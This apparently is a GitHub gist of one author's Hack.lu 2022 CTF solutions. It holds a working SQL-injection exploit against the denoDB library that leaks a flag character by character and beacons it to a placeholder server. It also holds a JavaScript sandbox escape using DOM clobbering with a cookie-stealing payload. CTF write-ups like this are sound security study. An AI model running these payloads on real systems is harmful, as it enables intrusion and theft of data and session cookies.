Last active
November 6, 2022 22:11
-
-
Save terjanq/1926a1afb420bd98ac7b97031e377436 to your computer and use it in GitHub Desktop.
Hack.lu 2022 CTF solutions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
This was an SQL injection challenge where the goal was to find a 0day in denoDB library. | |
The bug we found was that `?` inside column name would confuse the formatters and would insert there values. | |
--> | |
<script> | |
HOST_URL = (new URL(location)).searchParams.get('host_url') || 'https://0.0.0.0/api/food/1' | |
PING_URL = 'https://server'; | |
let alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'; | |
// alph = 'bfa'; | |
function m_payload(pos, char){ | |
const h_char = char.charCodeAt(0).toString(16); | |
// error based sql injection | |
// `'` in () does not throw unknown column error which was crucial part of the payload | |
const payload = `\`in() UNION select 1, CASE substr(flag, ${pos}, 1) WHEN char(0x${h_char}) THEN 1 ELSE abs(-9223372036854775808) END FROM flag;`; | |
// when column name contains ? then the next value will be appended to it | |
// /??=` in () gets translated to: `'` in () ` | |
return `${HOST_URL}??=${encodeURIComponent(payload)}`; | |
} | |
let flag = ''; | |
navigator.sendBeacon(PING_URL, 'start'); | |
async function leak_char(pos){ | |
for(let c of alph){ | |
const x = document.createElement('script'); | |
x.src = m_payload(pos, c); | |
document.head.appendChild(x); | |
let notfound = false; | |
await new Promise(resolve => { | |
delete window.SqliteError; | |
// If there are results the page returns an array of jsons which is valid JS | |
// If not, then SqliteError is returned which is also a valid JS | |
// I am defining SqliteErrorr getter to see if the script tries to access it | |
Object.defineProperty(window, 'SqliteError', { | |
get: ()=>{ | |
notfound = true; | |
resolve(); | |
}, | |
configurable: true | |
}); | |
x.onload = resolve; | |
}); | |
if(notfound === false){ | |
return c; | |
} | |
} | |
} | |
(async () => { | |
for(let pos = 1; pos < 100; pos++){ | |
const c = await leak_char(pos); | |
if(c !== undefined) { | |
flag += c; | |
console.log(flag); | |
navigator.sendBeacon(PING_URL, flag) | |
} | |
} | |
})(); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
This was a sandboxing challenge where the JS language is presenteded in the form of exotic, made-up language. | |
It's almost properly sandboxed but there is one bug that players needed to find. | |
The bug I found was to construct HTML comment (<!--) that is understood by JS and which makes it possible to ignore one semicolon | |
and then to concat array expression with variable name, like $var$['eval']. To get reference to eval we used DOM clobbering | |
and defined <iframe name=$win$> | |
--> | |
<iframe name=$win$></iframe> | |
<x-program> | |
<x-if> | |
<x-num>1</x-num> | |
<x-const> | |
<x-identifier>test</x-identifier> | |
<x-lt> | |
<x-identifier>win</x-identifier> | |
<x-not><x-dec> | |
<x-identifier>asd</x-identifier> | |
</x-dec></x-not> | |
</x-lt> | |
</x-const> | |
<x-array> | |
<x-str>eval</x-str> | |
</x-array> | |
<x-call> | |
<x-identifier>test</x-identifier> | |
<x-str>top.location='https://server/?c='+document.cookie</x-str> | |
</x-call> | |
</x-if> | |
</x-program> | |
<!-- compiles to: | |
const write = (s) => alert(s); | |
const read = (s) => prompt(s); | |
if(1){ | |
const $test$=$win$<!--$asd$; | |
["eval"]; | |
($test$)("alert(1337)"); | |
}; | |
--> | |
<!-- which is equivalent to | |
const write = (s) => alert(s); | |
const read = (s) => prompt(s); | |
if(1){ | |
const $test$=$win$["eval"]; | |
($test$)("alert(1337)"); | |
}; | |
--> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment